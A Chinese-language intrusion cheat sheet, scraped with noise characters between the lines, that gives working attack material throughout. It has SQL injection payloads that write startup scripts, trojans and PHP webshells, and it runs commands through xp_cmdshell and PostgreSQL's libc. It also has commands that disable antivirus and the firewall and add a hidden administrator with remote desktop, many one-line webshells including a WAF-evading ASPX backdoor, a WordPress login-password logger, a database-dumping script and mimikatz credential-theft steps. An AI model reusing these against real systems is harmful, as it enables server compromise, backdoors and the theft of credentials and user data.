( @) m/ w2 ^. C7 q8 K5 i+ N. xinsert into a values ("set wshshell=createobject (""wscript.shell"") " );! T9 H% N* p- P6 `
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );$ a/ H$ L% s; M r2 w) o1 u9 E
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );& Z3 a* ^1 D. ~9 S2 b. b
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";" L3 S! @+ j6 |# D- r j, ^
drop table a;/ J/ i9 x e/ B3 u
( z2 I( \6 u* t5 T; ~5 x* w. T& W英文版本:
9 W! E( Z5 A3 X1 s$ D% t, @" Y
" o7 F6 D5 U- c# }: L- E7 \9 y6 ause test;5 |# a# e$ O6 h4 Z% O+ q1 z
create table a (cmd text);
# t& ?4 O2 f1 q/ k+ winsert into a values ("set wshshell=createobject (""wscript.shell"") " );' W& P( I4 \0 ]8 j% c; o
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
3 e) ]$ ~4 r/ h& t7 j2 | U) {4 Linsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );9 E; H- L5 H5 R' L( F3 S- m+ f/ G) g
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";/ }7 R9 H* I9 {8 _" F
drop table a; t9 I4 P% T1 p: o N! e4 a, [
. h. P' ?- M. T! a
create table a (cmd BLOB);! \; T& I9 N$ t# K' X, M- Q
insert into a values (CONVERT(木马的16进制代码,CHAR));" {) J+ ?5 A* ]& o' |0 |
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'8 Y" K: x" C+ r4 x+ t3 b0 S
drop table a;
" l/ Y; W5 [& H' U, D
; U+ ]1 o" v5 P: d, t4 H记录一下怎么处理变态诺顿
" C/ G. O8 c4 \8 [ [0 X7 M4 D查看诺顿服务的路径$ M: m# P) {. l1 L
sc qc ccSetMgr- B, t& M9 U4 g8 A
然后设置权限拒绝访问。做绝一点。。
1 U4 z h( g1 o- J Y# v6 Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system0 ~1 L& b6 t" Y: l- b( L' Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"* N; L4 v% f* d2 {2 a1 T* r+ L" `
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
' i; W: ~; z1 D+ ?/ Hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone: E1 Y4 s! d8 v% H
8 `9 W8 s. `* N1 f然后再重启服务器
& H' v) X5 ~ T+ T- T) G* X2 `iisreset /reboot
2 U! v$ D, |( s6 x$ ^这样就搞定了。。不过完事后。记得恢复权限。。。。
* n5 x( x- Y5 e9 H) I- Mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F7 Y( G7 a) O+ J4 b. y/ ^. D4 s
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F. p4 T' P* ]6 z3 P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F; B" J) }6 N8 y$ D8 |8 f
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
% e7 x; q. b+ Y" oSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
, v6 X$ B5 }3 d9 o- e' U0 f
# E; l4 Q) ?: W6 H! W5 n4 UEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
/ ~& Z+ X3 P. I9 e% I0 K8 D2 `. O6 c& w k4 G; M
postgresql注射的一些东西0 w- _) z1 Z/ G/ I2 w* b
如何获得webshell
) U* W( c$ j/ N% m% z, Ohttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
4 R1 b; ~/ M" M; q2 w# _- I# K; b- V, D7 uhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 y) y' G, q2 O4 ^) Whttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
4 i) j2 s, ^9 Y, }' a2 z) X如何读文件
0 E6 a# H' {# [- C7 B" m1 V3 Phttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);; j' m# h' r) B+ v) y
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
8 N* A6 \" A9 ?1 W: m, T/ P' {http://127.0.0.1/postgresql.php?id=1;select * from myfile;! P' [ D. o4 @" I1 \
. h4 w" @# ?7 J, i& Xz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。 l1 u; K; Q% U3 F- E) a
当然,这些的postgresql的数据库版本必须大于8.X+ J) }5 g3 Z3 F7 O H( S
创建一个system的函数:9 `- ^% Q( {# K' ^. F* V+ f
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT9 f& T# l: ^) J
; O; p: [6 o: g0 S" c9 G& V创建一个输出表:
3 `+ a7 V$ O: y3 ?8 ] pCREATE TABLE stdout(id serial, system_out text)
$ Z9 \1 c$ S, E! u" [4 D5 Y* U) }4 G, x- [- h5 a% p5 y( s
执行shell,输出到输出表内:
+ h/ N# K! W0 vSELECT system('uname -a > /tmp/test')
: `+ @6 Z5 d( }% Q
( e x# D9 ^* z; q( s7 y. R: jcopy 输出的内容到表里面;
8 S) m9 ?. q0 l2 D& p, U1 D8 T+ l& ?COPY stdout(system_out) FROM '/tmp/test'
H- b2 b6 K8 ?: p0 I* y# k' y" O& v8 g& o6 F2 t* Y2 C, g
从输出表内读取执行后的回显,判断是否执行成功
, e( p" X) Q5 K2 ]- B/ K' _0 I5 ?* M! D* N) p
SELECT system_out FROM stdout
8 J$ M8 M8 l, W/ a9 ~下面是测试例子
6 B1 }! ?. @6 {8 w
9 H( b, b% L8 L' u$ s/ m" w% ^/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
# b$ y$ k* V! d9 v1 d
- P X' F' q% {5 |0 [& T/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
$ V; g4 d0 z* nSTRICT --% j3 P/ w; m0 B v# I, X
6 t# Q6 ?# i* ~& u V' s+ b9 d
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
7 T8 r( U% h3 l$ } Q* x8 r1 s7 `/ F8 z' r
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --6 R: \# z1 z ~$ g8 o# W
$ m8 \2 g. u/ ~7 ?8 _* ]8 o a1 H
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
3 r1 o1 C3 I& gnet stop sharedaccess stop the default firewall" e/ Q/ t7 X" x. W8 D# S
netsh firewall show show/config default firewall6 v/ S/ z) l- _9 T9 }- a6 Y
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
" K! B' ^) n" p( xnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
+ K* [. P/ G3 j8 C7 X7 J& }修改3389端口方法(修改后不易被扫出)* C2 ?; ]( F7 c- l
修改服务器端的端口设置,注册表有2个地方需要修改
- p7 d) \* ]7 Q5 f5 ^' B' _
7 q1 h/ A0 G% a' S" i& [8 i[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]+ F+ a/ G: M; V) { ~$ |
PortNumber值,默认是3389,修改成所希望的端口,比如6000
I7 B- J) b; f7 p0 Z+ v
. c' }1 h5 h, e: c/ ~7 o第二个地方:
5 n3 z7 F) {; G[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] / @2 U: R; u/ G6 z! M
PortNumber值,默认是3389,修改成所希望的端口,比如60000 ~5 I: ~! T# V7 H& G/ E# o
$ _9 m+ `( y; k# e- V现在这样就可以了。重启系统就可以了' Q8 t N; ]/ e [4 q0 h
1 f/ k$ E0 J. d0 u ?% w8 R7 v查看3389远程登录的脚本% ~% a( j/ N# Q+ r$ ~- B
保存为一个bat文件
9 T T" x9 R1 udate /t >>D:\sec\TSlog\ts.log
* \4 q g0 O' ttime /t >>D:\sec\TSlog\ts.log
+ w# b4 P) E8 j+ b3 J3 d$ g, Ynetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log3 Q2 j2 L f( ]! |4 L. U
start Explorer
% A9 v& T" i% |
% O/ @( v3 [8 `8 wmstsc的参数:) |; w5 x) h6 Y2 C7 a6 K9 b" R8 D
' u" k( u/ q, b. n远程桌面连接5 p5 Y% E, _( `% g, K, X$ K
- v, t6 Y4 c5 `' u2 }2 ^. v
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]- @$ ]+ y+ G0 P) \- [$ o: Z
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?; @' ~. d& \" f4 a
7 R" b, o# B. }8 W" ?5 \<Connection File> -- 指定连接的 .rdp 文件的名称。
7 ]5 w$ p- T& v4 N8 @# a; c* w, ^2 G- n
/v:<server[:port]> -- 指定要连接到的终端服务器。
1 S( f4 Q! A" o- x0 M* T+ f- l* _
% l; o1 E/ N5 h8 N0 q `+ U: _( W9 j/console -- 连接到服务器的控制台会话。
6 U7 }! |4 ~( b. u( M1 ^' t! b% V$ i6 O7 c) V$ \, a1 s* v0 y y
/f -- 以全屏模式启动客户端。$ ^& ` M" w+ |4 {$ V/ ]( I3 V! l2 y
$ X. j- L" |6 \
/w:<width> -- 指定远程桌面屏幕的宽度。
( p" n5 y( d3 i
, b! Z% |, J, u4 d. x3 H/h:<height> -- 指定远程桌面屏幕的高度。& L+ a2 W0 L. d
^+ V8 l% V$ Z
/edit -- 打开指定的 .rdp 文件来编辑。2 @$ t4 M/ G2 W2 j# ]4 g
. T# a+ r% W: W( D9 \/migrate -- 将客户端连接管理器创建的旧版
8 H; L6 Q7 q$ b" u# j" q连接文件迁移到新的 .rdp 连接文件。! n, O. j' q9 w9 c$ G( \
6 W& C4 ?* i% C* {. L; S% p4 z9 H3 W1 }$ o; O( ?& |
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就+ f* B6 k0 M; y3 W( q+ C V
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量7 {9 C/ j8 c( h v
/ U) g5 Y+ V; k' j- o
命令行下开启3389& f1 R( q0 W6 q1 R, _) T
net user asp.net aspnet /add
, H' d) \6 h! g6 T' x. b# ^net localgroup Administrators asp.net /add! c0 E; W8 ^/ J' x9 x6 v
net localgroup "Remote Desktop Users" asp.net /add2 {1 ?$ \. C( ~. p
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D; o- b2 w# Y( i( f1 L: A$ |5 R; x
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 06 n6 O1 t% Z; a% B
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
, E0 S* I4 t! wecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
+ {- |# y3 C5 C4 V; \/ Q6 [sc config rasman start= auto
' h* ~4 ~ O# C# z0 asc config remoteaccess start= auto
2 O- r' ~/ l/ c, f, Xnet start rasman; @9 {! z+ h4 X! F: g/ R1 U3 t
net start remoteaccess8 i0 R$ f7 p+ E' l" L
Media' f3 M6 `& _& R; H4 H2 Z
<form id="frmUpload" enctype="multipart/form-data", j M6 y* R6 ?
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> t. M5 l1 E0 @/ z a3 t/ f5 c
<input type="file" name="NewFile" size="50"><br> x9 h6 x( Q7 K d$ P
<input id="btnUpload" type="submit" value="Upload">( z) ?# r* t9 T: f% X; w* R& Q% J, z
</form>& b3 H J' Z, J7 J# |4 M; }3 H
+ n$ S0 f; {# U. Rcontrol userpasswords2 查看用户的密码) q, W A3 t, j& b# r5 ^
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
" Z& E0 W5 O' \! WSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
0 s/ I! o6 \7 q$ ^0 T# Z3 l- g& p$ F4 M# L
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
0 e! P1 N V( p( O% {测试1:4 \- C) ?/ Q6 P4 ^) S- f
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t13 w$ A/ E. @* H5 T; j
1 Y/ N$ k3 k$ ~测试2:
# e Q: _, `6 Z9 Q4 q% w
; _& K1 Z# k/ B7 N/ M5 Vcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
# l3 O" T2 V' g1 d3 v
9 K+ d( x& _; ?9 _* r" Pdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
$ @( i, q. d. K# M+ ]
4 B( ^% D/ i4 [; b' j9 zSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
4 S6 j# p, i4 z f3 d9 ^4 ?关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
2 \3 D7 ~5 ]3 u ?% z1 }! V可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;% L n4 {/ r: W# b. k
net stop mcafeeframework; ]5 \% x) d7 o+ V/ [
net stop mcshield
' U& Y3 D0 I! W0 P0 wnet stop mcafeeengineservice7 B5 E" W" O- O: k2 ]! ?0 ?8 L
net stop mctaskmanager
. ?& [% S0 ~1 D9 K) X# n7 zhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D& o5 D& @7 z [2 M3 o: A
$ E8 p% j3 v# N% P/ P% i VNCDump.zip (4.76 KB, 下载次数: 1)
4 }0 H# m1 C3 T密码在线破解http://tools88.com/safe/vnc.php D3 h8 f8 W3 s2 U. L
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取6 i$ M6 c7 W5 P1 K8 ^* g
. E5 I! |, \5 @: E/ H. G2 X2 K+ H- ]; a
exec master..xp_cmdshell 'net user'
9 X. d$ n$ N" J+ p+ O7 i) Hmssql执行命令。
+ A% o, f/ f% x* N获取mssql的密码hash查询9 p) O4 ~$ \# Y" T3 ]
select name,password from master.dbo.sysxlogins& ^) M0 ^% |% i
7 r) F' R; T" G# b) r' W! O6 M
backup log dbName with NO_LOG;6 P0 I) F4 S$ Z+ `' m9 ^
backup log dbName with TRUNCATE_ONLY;9 d5 ?+ Z! G9 ^2 B
DBCC SHRINKDATABASE(dbName);8 y& d3 x; s$ B5 i
mssql数据库压缩
. ~. m( r4 v4 ?/ m$ ^* w: M6 z: E7 F7 C. @% y9 g f
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
0 w9 W8 x; {$ _2 A+ ^6 Z9 A8 m将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
; a6 e2 f% O ^9 A& E% @1 ] }7 {. _& t- B5 P
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'5 i7 K! v2 C$ y, i& v0 X7 Q
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak* k9 l- c0 A( F3 Z6 H/ n+ U
& b2 C6 T: v' P! |6 J( Z
Discuz!nt35渗透要点:
) L0 Z# ^" ^, h- Z* A4 u1 e3 B(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
2 w% `; b2 T4 n9 f+ o(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
) X: [2 W9 p/ l(3)保存。. l! F& {& ^: S1 O6 J8 \
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass/ h/ t& U# U$ d ~
d:\rar.exe a -r d:\1.rar d:\website\
0 I4 c) i! L" z递归压缩website
+ T y7 W$ d! a. A2 C) F8 v注意rar.exe的路径
8 X: C6 ^1 U7 k! R2 D o2 l: u' s1 {
<?php; m3 \9 {5 F* e/ G. n
0 Q6 `9 T$ C4 `& ^1 R5 l% Z. C% _7 [$telok = "0${@eval($_POST[xxoo])}";
( [. n u1 e6 Y4 k4 M
6 ?5 N2 U0 z+ V/ I. ?; i$username = "123456";% F5 {. u }$ p+ X: }
. t- g3 x. W s* h1 V4 X0 u
$userpwd = "123456";
, X/ e3 F# ?, s' h) S/ ]
7 M2 T7 e- w1 j$telhao = "123456";' O0 f) T, [7 S6 Q0 L8 b* }7 m
3 v" R/ I6 _( ]) s1 _$telinfo = "123456";9 l% Z. [; y$ D3 C2 f% v8 S$ C; \
8 F2 G% o+ h5 P/ b4 G?>
+ ?2 Z3 ^# \: h5 Jphp一句话未过滤插入一句话木马; @$ q- P' @4 q* c0 F' q8 a
$ F# {6 u5 \& y4 U. }
站库分离脱裤技巧
% w& w1 V# q9 h' c) p; e8 sexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
0 j8 ]4 F$ N4 Z7 I! g/ b" v# Mexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
- R( {2 r7 r6 V F3 |条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
3 r4 t3 E9 G4 _. X: ?$ r这儿利用的是马儿的专家模式(自己写代码)。- M! \* m [# H* h Y# T6 N
ini_set('display_errors', 1);" T/ i& p8 P/ [- P; P! T: G9 j
set_time_limit(0);
% h- Q* z: g3 l2 q* S" jerror_reporting(E_ALL);
( `& {2 m% E" {0 J$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());! J, {' V: \3 O
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
8 B# \) S, [7 m$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());, j1 R: U4 W% ^ y- m! o1 u
$i = 0;
$ X( t$ C7 h. G$tmp = '';! |% R2 I9 b* U
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {& I1 X# G7 r1 Y* T5 b
$i = $i+1;
Z6 e+ Z2 |# }2 f $tmp .= implode("::", $row)."\n";
7 ^! _5 G9 S: R0 q) L* @* c if(!($i%500)){//500条写入一个文件+ K! k7 J+ t- z# r( M+ v
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
' b" K6 J( m/ I" ^0 J' K9 t/ f: c# o file_put_contents($filename,$tmp);+ i" m9 L b6 m% z! z% ]
$tmp = '';5 F3 \/ j$ p) Q
}
$ t) C" m4 Z/ o8 j}
. n- U* j2 A) x' B' C2 g& p- |+ X! Vmysql_free_result($result);8 e- h& q9 b' R1 w5 z
~$ [: j# K% C! z/ g' d' K1 G; k3 m0 _& s8 S9 V
2 `& K- W+ j3 {6 p- l
//down完后delete
# b1 i+ y" g' H% K! c: b8 L0 h5 m- N/ j% k' u
7 U! v$ i0 F$ Mini_set('display_errors', 1);+ T; y1 F$ h& _1 J. l; g
error_reporting(E_ALL);
2 L& u& w/ U% @# f2 v$i = 0;
/ j% e2 H5 |. M) c$ c% r: T* W/ R7 ^: dwhile($i<32) {
/ B- k3 \7 l6 f" ^2 u7 X. g7 C $i = $i+1;6 o! }$ u2 Q8 @) L/ c" C
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
& |1 m6 I" b1 ?) k/ W, ~9 _" q' ~* F unlink($filename);/ X- J6 J9 v) s" ]# v% z& a
}
0 ~: _: Q- T% F4 v: }httprint 收集操作系统指纹
, U4 P7 @ `/ w: P6 o4 E9 i# j扫描192.168.1.100的所有端口. _2 M3 _9 c$ H! X
nmap –PN –sT –sV –p0-65535 192.168.1.1005 e1 w: S$ V7 y' }, H2 v
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
. Y: Q$ O6 [/ C, o. {host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输3 l [5 K ^$ H* B+ v) Y0 `% N
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host+ i t; @" S) d [( D8 B
+ `0 C! u# R7 G1 D S2 k+ hDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
- ~- T: ?3 [3 V7 V0 x3 N0 |" u. x1 J5 }5 ?1 {5 ~
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
& x, N' F/ T+ {. n- t! C
. L( x' q2 @6 _* O0 w2 Q Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
( C9 L, N# v* h2 ~( u+ W
! d" L8 H( u' O8 ` DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)1 t9 O$ p% n( M* F, S$ E' u. j
( z4 J- P! v) s. k9 K http://net-square.com/msnpawn/index.shtml (要求安装)
( l7 S+ u# t/ z( |; q, J2 V, k6 S) J0 z, ?
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的): \- `) }+ k- N# }, r
* R- x2 b- D; ~; P4 b1 U SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
' e) A: r( [! ]set names gb2312
# D8 j" _% B; M) e/ m导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
/ a& {, e1 Y3 x1 n6 U
! ]8 G: \0 v3 k5 n( P2 w$ T1 b0 G- t7 v/ |mysql 密码修改
$ q% ~6 l1 `2 o) OUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” # V8 [9 B: \$ S- _
update user set password=PASSWORD('antian365.com') where user='root';
- E1 X; }" |7 Pflush privileges;
! G+ z8 [; a" Q# J/ X+ ^' @高级的PHP一句话木马后门0 m" f& b& Q" a1 c( m. ?: v
$ M4 }& q4 d! g6 b2 ^
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀( k7 p# M2 o. K1 i
3 V: _; P1 E, a5 _3 T; n9 e: p; s
1、+ }) D* q$ G1 A0 v* ]. N7 M
; n' u& c) e( f$ m* D+ g U% ]$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
' b8 M$ d- B/ w2 A' M8 n& H: A2 |4 C3 u5 B6 _2 C* t$ X# I3 k1 U
$hh("/[discuz]/e",$_POST['h'],"Access");
, m! ~" H9 ` I u3 F8 ~) `
' S, _% D# d' e5 ^) Z7 u//菜刀一句话1 X5 }4 Y& S3 q$ j
5 u4 n+ H: ~% B# @" |2、- L6 C- A1 _7 y/ F' Q6 a- M3 m
, L6 r1 _+ W$ z0 B i$filename=$_GET['xbid'];" G! G/ ]' ^: d" }
0 a5 ?* ~* E0 Y6 }4 A$ Q/ D
include ($filename);
; R" Q w6 \1 w1 _! ^2 d6 I5 B' A7 |0 N
//危险的include函数,直接编译任何文件为php格式运行9 {4 [( J" l4 p+ _; a
: K' C. N( W% [1 i1 Z9 A( ^/ e$ ~3 C
3、
2 i0 P7 v* K! ]# }5 d2 R3 c3 J8 p, z! h S; v' c {
$reg="c"."o"."p"."y";
! G' t4 [" }" T: Y6 O4 B' B9 x* q3 z$ l4 Q N) V$ d5 A8 Z9 S
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);; N) a: [/ g `; |+ X5 a. U
* C( e# Q, d3 t+ o }. j$ c% R//重命名任何文件
' |, O \$ Y2 O+ @- e
4 d/ I s0 e6 t4、
( Y9 `3 L$ Y0 {. j3 H. m0 U9 R7 N% ^" B
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 V+ }# K3 X9 w( B8 q. U
, h) e5 |( t6 g( b3 r0 q
$gzid("/[discuz]/e",$_POST['h'],"Access");, Y$ J9 o4 d1 ?* j. i2 c/ T2 G5 r
, M& [: D/ ~% E1 c" y
//菜刀一句话2 J) F3 ~/ ^* i6 v! O
' u! n+ I, X* c* E
5、include ($uid);
; I ]; s( q! }; v8 Q& v1 i& O# `2 z6 p* m. a- |
//危险的include函数,直接编译任何文件为php格式运行,POST * @9 j6 q M% B2 T; `. a
, Q9 s. P* l }- K
$ |; J1 G) P. S, o* p//gif插一句话6 S8 Q5 B8 m) y8 I- _! C2 y
! m A4 f( {0 X- A# f6、典型一句话
! Z! A- a. e9 k+ e' k6 p' l2 B2 v$ e) v2 @5 p0 A# d
程序后门代码
6 b. K( w C+ x& q7 z7 d<?php eval_r($_POST[sb])?>- h' N$ _- u+ b0 d* ^: g5 m
程序代码" D1 j1 O i" O: j& N% ]
<?php @eval_r($_POST[sb])?>. D1 D1 i1 u( A h
//容错代码
1 |9 o$ j7 k: l3 A8 w8 R程序代码
! N. A/ |! e- N e0 m7 D<?php assert($_POST[sb]);?>
9 l0 ]$ S) `$ I0 N- ?: r9 [//使用lanker一句话客户端的专家模式执行相关的php语句
% n& u1 w* ~' m程序代码# ^1 a* \, a! L- r0 u1 S; x0 O3 Z
<?$_POST['sa']($_POST['sb']);?>
0 h" T* b8 S [' Y- ?5 A8 |程序代码
+ X, E2 @/ {. Y& Z% E% h. c<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
" R0 m* A- W: s8 c2 X程序代码5 G2 D3 e: @! f
<?php
7 |$ `# {( R" E4 ?# i+ l& p7 ?/ F@preg_replace("/[email]/e",$_POST['h'],"error");
+ X' ~# k4 G8 ~, b! T?>
' c( w3 Z- z$ y; t2 b( V//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
2 u* a) H" f0 r) D/ k H3 O8 X u5 d5 X! l程序代码$ o. R6 m1 l* T1 Q+ R+ `
<O>h=@eval_r($_POST[c]);</O>
* C$ v5 f/ \* k! L# G3 G: K程序代码
1 c4 Q0 |4 q/ I<script language="php">@eval_r($_POST[sb])</script>
2 E3 T% @( {! W: T/ o# w//绕过<?限制的一句话2 S+ B. k* B2 @0 @- C
, S L+ [' e; M: v4 Z
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip: ]. e p7 L s! G4 j F
详细用法:
- y6 _* t' R @3 T( q1、到tools目录。psexec \\127.0.0.1 cmd+ q1 I% U4 Z5 L5 x9 t5 Q* Z; Z8 i
2、执行mimikatz2 P, E' j8 b' h- T4 X
3、执行 privilege::debug
- ]; C2 S# ~4 g1 W) ^/ w4、执行 inject::process lsass.exe sekurlsa.dll
8 t, I% L( m5 l; E0 e5、执行@getLogonPasswords- ?9 x% V8 [5 c
6、widget就是密码
3 m+ [: {7 h! P7、exit退出,不要直接关闭否则系统会崩溃。7 t: q2 k, I% b. J$ A3 H
$ C2 D* A5 v& @2 W) }7 U
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面& W! _% B% u9 H
/ S& m% H1 ~9 z
自动查找系统高危补丁
* G: u4 L3 X$ q/ t9 T/ Xsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
3 W/ ^$ y/ }- }, |' e* q( S3 J
% {, H+ Z: | @2 @0 o# [2 k# m突破安全狗的一句话aspx后门
! ?, H4 b& `) A& x<%@ Page Language="C#" ValidateRequest="false" %>
6 q2 @' d5 |2 `: ^, _<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
) Z N2 p8 t0 N iwebshell下记录WordPress登陆密码! f" S$ Q1 v, h: F2 I/ A
webshell下记录Wordpress登陆密码方便进一步社工4 V; d: E! v7 [- [4 b' d
在文件wp-login.php中539行处添加:3 \# T" ?5 r/ Z6 _$ Z( @5 X& t
// log password
6 |9 a0 b5 Q, V/ n: W$log_user=$_POST['log'];. F9 _8 h/ _1 x- U! V
$log_pwd=$_POST['pwd'];
; ] o4 U9 p8 @& l$log_ip=$_SERVER["REMOTE_ADDR"];
& V7 p9 ]+ B. q9 M% v# W$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
0 K4 H. X. d/ _/ {# P2 S2 _& z5 B2 J$txt=$txt.”\r\n”;" a7 W$ S$ i, Z# w+ r
if($log_user&&$log_pwd&&$log_ip){2 J' e# ^6 p3 W" s( N" C
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
, V; `1 Z% k1 S}
n, R4 q; H+ x% {当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
( n% F" J. i! A `8 i: R# e; d就是搜索case ‘login’" r1 E4 Q2 |/ Q- a' V- {
